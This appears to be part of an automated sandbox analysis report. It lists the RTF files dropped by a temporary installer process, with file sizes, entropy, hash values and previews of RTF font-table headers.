                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):36808
                                                                                                                                                                                                                                                          Entropy (8bit):5.0329736161419865
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:q4eM4jXTicPI0QhhiLVFBbRTRYDOuJLrEZLZ/6A9i:q4UyUnVIA9i
                                                                                                                                                                                                                                                          MD5:F9230F9C9FA57AB35625AD7DFD1D21A1
                                                                                                                                                                                                                                                          SHA1:27AAAF7B861E3C1A0D017377E0F59801E143D59C
                                                                                                                                                                                                                                                          SHA-256:85125B0682653CE7A5E9569F8480A87F5A3F1D3978B47A3C1AAD5FE80401D7CB
                                                                                                                                                                                                                                                          SHA-512:A8FB380CD3DB166ECF2174097158B4261020E8AB376A2B6180958BC615CEF3F7CFBC4D4D437ADC454801FC9193E80A94B56C54B4CB2CAF4485043F34B132F99C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):61781
                                                                                                                                                                                                                                                          Entropy (8bit):4.857520301127485
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:2aTIM0LDyaeOsDvEpd1rTmMYm7JRFOtf1SPuJtxLs2coKPvZZ0Z/6A97:2asMQwPIA97
                                                                                                                                                                                                                                                          MD5:78E67BA68FD674E528877B2C4ED0EA13
                                                                                                                                                                                                                                                          SHA1:2393978ADD7BA637E654A9FDB1815BB2D4000BE2
                                                                                                                                                                                                                                                          SHA-256:E023BDA87BC91024BDF8117E2E8FD19628ED0006DF399033A1FDF0A261CD90F8
                                                                                                                                                                                                                                                          SHA-512:D3306182B95C93CB4DDDD7219239F8F927EDD1BF5F3134B89E19637760B8E3F051EBA9ED8EC193CA31D04FDFF2FD75AF6A3F119C357E244DCD7DB151B8061753
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f39\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial CYR;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 0202060305040502
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):43270
                                                                                                                                                                                                                                                          Entropy (8bit):5.005983710564955
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:384:2aFkyWNdW2OTYn/akJOc7jgskl7rVGGH249LYeoYGEovrMoQJhYNgDPsKknWeo7L:2aFk9Oc7cskl/VGGW+2/Z/6A92
                                                                                                                                                                                                                                                          MD5:4AF18EE9439DF76D12E065E6AA400E6F
                                                                                                                                                                                                                                                          SHA1:B9B939259BD0012DDF6A025199CB670F7B3C0CCE
                                                                                                                                                                                                                                                          SHA-256:DF734E3254D106D22C2C57D81E1C8BA28DAB721488DBB48930516B94948A19DF
                                                                                                                                                                                                                                                          SHA-512:80534BA7923F78792211AF00922D7B9E15A4FB25BF1661353BE820690EF3CDED245AC9BC951CF2BC6F48D8B9C5315DDE74DA9FC2CB8BE097ADECC3BE3EA07270
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch31505\stshfloch31506\stshfhich31506\stshfbi0\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 020206030504050203
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):45355
                                                                                                                                                                                                                                                          Entropy (8bit):5.032998271538751
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqeXxd/1Ca9DGi3w2EHnT2njX8x3FXbv4CD5klkhuhr7RVRatot7kzkAkqkVk2gJ:qqoC8IA9E
                                                                                                                                                                                                                                                          MD5:37B0C0E48F0AF77161430D5DE894A950
                                                                                                                                                                                                                                                          SHA1:9D27E00A6B141CA123DA1E9E0C7C768CB89910E0
                                                                                                                                                                                                                                                          SHA-256:61FCA2437288DDC4692FE93CCE90C3C72C0ADDBD08C5662F391F6EF694B27256
                                                                                                                                                                                                                                                          SHA-512:AC5463F888305FA6BBAB57CA80570B51249A2719C8A1B116B4EB574EEB2D724718CC676092CEA9241F3B72C2B2D0C63137553A7CE4DD8A871ED46E37D63FFEC1
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\f
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):49985
                                                                                                                                                                                                                                                          Entropy (8bit):5.016054674805171
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqegxdUjOcPI0QhhiLVptabQhOsWxspoudZdRdud9dWlxjRw4L41PcQhiuOdcJpw:qqH7UnexIA9k
                                                                                                                                                                                                                                                          MD5:6817C14DB33376EA13F5135582FEF07A
                                                                                                                                                                                                                                                          SHA1:AC55EF25E5BA0C63319C2B7750AD3FB3B6141D1D
                                                                                                                                                                                                                                                          SHA-256:8E6A77CDCF0EB74491B22151BCC19798620754E7F069D76227F8C2C1E28778B7
                                                                                                                                                                                                                                                          SHA-512:81B3E721842C1F1CA3581AF69CB6495756EECAFD14385C512E5CEDFAF98BBED387D6B9AB27ED76754B17FFDB8B2E5414108702BD6E5B4A8DA27E821D9D7FF3B6
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\f
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):48785
                                                                                                                                                                                                                                                          Entropy (8bit):5.035435060271824
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqFy4a4jeDCcJ+Lj5g5V5V5h5G5P5N5hBcqtqYepnRbK3j10C0O0N0e0x0b0o0g4:qqJ9CxIA92
                                                                                                                                                                                                                                                          MD5:DC2C7249084FEEBFE9F1E4FB3491C9EA
                                                                                                                                                                                                                                                          SHA1:B1F39695D01244B8D85F9FE40D24B809759DB0FA
                                                                                                                                                                                                                                                          SHA-256:D5EE096B03118AA2E7032A80EAD45F1C1D180889E5C0D9140F5C7D999698EFBD
                                                                                                                                                                                                                                                          SHA-512:6B83FF30438154C6D58F7BA35FB6D01DA65D3B696340B522653DB3AEAD830DF67CEF61B1729197E24E8A160558418CBF639E5F31D6D2E990527C1920376FCE0B
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):48379
                                                                                                                                                                                                                                                          Entropy (8bit):4.996608771533116
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:q4e94jXjOcPI0QhhiLV9xB3T7JileOhvbNbZWvsn53NB0DNZGky8OF5x1A58GaQg:q49OUnIIA9p
                                                                                                                                                                                                                                                          MD5:B8EA7A3C55CE02A64BA0AF23B9B85E3E
                                                                                                                                                                                                                                                          SHA1:8DFFB3874BBD2EA54BE1E6D87356126B1E73F290
                                                                                                                                                                                                                                                          SHA-256:792111EFE4C09E3F68D0E2A5344ACC12D63B351BAE5F1654FCC36F2471ED7667
                                                                                                                                                                                                                                                          SHA-512:A8A46F16EC9F8CE3670B171DD90F84F9D1F6CD15FC0428E3DB95ADB4AE302D0A82FF837A9C1DD32EAEEB7D8A58F942DB79461FB5BA36C869CBF4EA7210747007
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):42126
                                                                                                                                                                                                                                                          Entropy (8bit):5.024542957132508
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:q4e94jXjOcPI0QhhiLVtwYMgT+h6asH7UlKBGcg5dEmR7iC//+U1zfymCRwFOcEz:q49OUnwIA92
                                                                                                                                                                                                                                                          MD5:08B4567798ABE579F2D14EA033F94E31
                                                                                                                                                                                                                                                          SHA1:28E3F5CB129DB9B3B33E104773609BF86C8A6861
                                                                                                                                                                                                                                                          SHA-256:2EEB8BAA34230B1D075F9E9C59289BC3B1ACDAB08EF0A181A1FB43F6F3F1BD41
                                                                                                                                                                                                                                                          SHA-512:7F8F5598E931CCCBB0F259AFDF369E7A8FDCBBFE1C222EE8B4D5FF16FE502D4F9BDF54799D3C8420FC5903624DCC7E0412197A067FBA3EF82862ECD491C6F312
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):48100
                                                                                                                                                                                                                                                          Entropy (8bit):5.025830167724142
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:q4Fknx1eiCUYCmpNM2UrPGsGx7TYlDIUldgOQrrFrf7IPWj2sqiHTLb3ybVaGMbQ:q4giYIA9b
                                                                                                                                                                                                                                                          MD5:89ED020D20DA91E6E1F6AF7A3A4C3ED8
                                                                                                                                                                                                                                                          SHA1:B387B9E8EE99429E41090937A41D60564CA50A5A
                                                                                                                                                                                                                                                          SHA-256:29857E5F65A83CB250D7374A4AAFBCC1159C4318942F5044C9C12534A1962B41
                                                                                                                                                                                                                                                          SHA-512:1CBFA048F043D784062288EC39E5A89F74EF418CE6FBA1C2FFA32555B993C446CAC8ADB63B05D2E60FF3DB65735E55664C954D84AC4F21DDB94542BFE536F6BF
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):36808
                                                                                                                                                                                                                                                          Entropy (8bit):5.0329736161419865
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:q4eM4jXTicPI0QhhiLVFBbRTRYDOuJLrEZLZ/6A9i:q4UyUnVIA9i
                                                                                                                                                                                                                                                          MD5:F9230F9C9FA57AB35625AD7DFD1D21A1
                                                                                                                                                                                                                                                          SHA1:27AAAF7B861E3C1A0D017377E0F59801E143D59C
                                                                                                                                                                                                                                                          SHA-256:85125B0682653CE7A5E9569F8480A87F5A3F1D3978B47A3C1AAD5FE80401D7CB
                                                                                                                                                                                                                                                          SHA-512:A8FB380CD3DB166ECF2174097158B4261020E8AB376A2B6180958BC615CEF3F7CFBC4D4D437ADC454801FC9193E80A94B56C54B4CB2CAF4485043F34B132F99C
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):80841
                                                                                                                                                                                                                                                          Entropy (8bit):4.938561816408635
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqFy4Ix1ELz8lH0RvI9uMT98i3w2EH6mlH0RvI96M0+IOq4e4ewuwPkvEaUuuSD8:qqJC08J+nMVIA94
                                                                                                                                                                                                                                                          MD5:22F333AB0A5F3E545899218EE216E751
                                                                                                                                                                                                                                                          SHA1:50AB0BCFD2E86F7FD771C7CB18346AEACF834557
                                                                                                                                                                                                                                                          SHA-256:5C6BC98349F242C511354DE1383E1F4C1D294118E300CF9DD5B0A8C937A17DD0
                                                                                                                                                                                                                                                          SHA-512:2FD3FCFC64C9E870915CE1D8830E0F69031370DA502C4158D212F42FCAFF55BD0CBBFB915AD94A193BB7DEE8426167669FBD87C932BCE4D1591D2784744EFBB5
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f2\fbidi \fmodern\fcharset204\fprq1{\*\panose 02070309020205020404}Courier New;}{\f3\fbidi \froman\fcharset2\fprq2{\*\panose 05050102010706020507}Symbol;}{\f10\fbidi \fnil\fcharset2\fprq2{\*\panose 05000000000000000000}Wingdings;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\f37\fbidi \fswiss\fcharset204\fprq2{\*\panose 020f0502020204030204}Calibri;}{\f38\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604030504040204}Tahoma;}..{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):38593
                                                                                                                                                                                                                                                          Entropy (8bit):5.02789644916169
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:q4e6xdUjOcPI0QhhiLVpUGXnT9bZhdfGjlrqCHy/RKECA13GPkmZ/6A9S:q4L7UnoIA9S
                                                                                                                                                                                                                                                          MD5:030CBC2FE247F98453B82ABC39C3C966
                                                                                                                                                                                                                                                          SHA1:D5F3102D3878F32C5A5FC7AEE0AF3F63DDB74119
                                                                                                                                                                                                                                                          SHA-256:88E89133FC2542C74552BC4AD65320B01F08ED3A1E5269C008A0236BAF0C0893
                                                                                                                                                                                                                                                          SHA-512:86109DEF32876A40F30B9A4D7D5366BE4FA07D62F3019CC269F3F1A7BD68C2C6597BD2341E0CEAC72951D2B8C66DAEBBE46278ECCAE7CC4D54F32FA9C5B833ED
                                                                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                                                                          Reputation:unknown
                                                                                                                                                                                                                                                          Preview:{\rtf1\adeflang1025\ansi\ansicpg1251\uc1\adeff31507\deff0\stshfdbch0\stshfloch31506\stshfhich31506\stshfbi31506\deflang1049\deflangfe1049\themelang1049\themelangfe0\themelangcs0{\fonttbl{\f0\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\f1\fbidi \fswiss\fcharset204\fprq2{\*\panose 020b0604020202020204}Arial;}..{\f34\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria Math;}{\flomajor\f31500\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbmajor\f31501\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\fhimajor\f31502\fbidi \froman\fcharset204\fprq2{\*\panose 02040503050406030204}Cambria;}..{\fbimajor\f31503\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}{\flominor\f31504\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}Times New Roman;}..{\fdbminor\f31505\fbidi \froman\fcharset204\fprq2{\*\panose 02020603050405020304}
                                                                                                                                                                                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TGL7N.tmp\404.tmp
                                                                                                                                                                                                                                                          File Type:Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
                                                                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                                                                          Size (bytes):50749
                                                                                                                                                                                                                                                          Entropy (8bit):5.025992337478631
                                                                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                                                                          SSDEEP:768:qqFywxd/cCcJ+Lj5g5V5V5h5G5P5N5hBcqtqYepnnbxa10C0O0N0e0x0b0o0g0sq:qq/MlIA9E
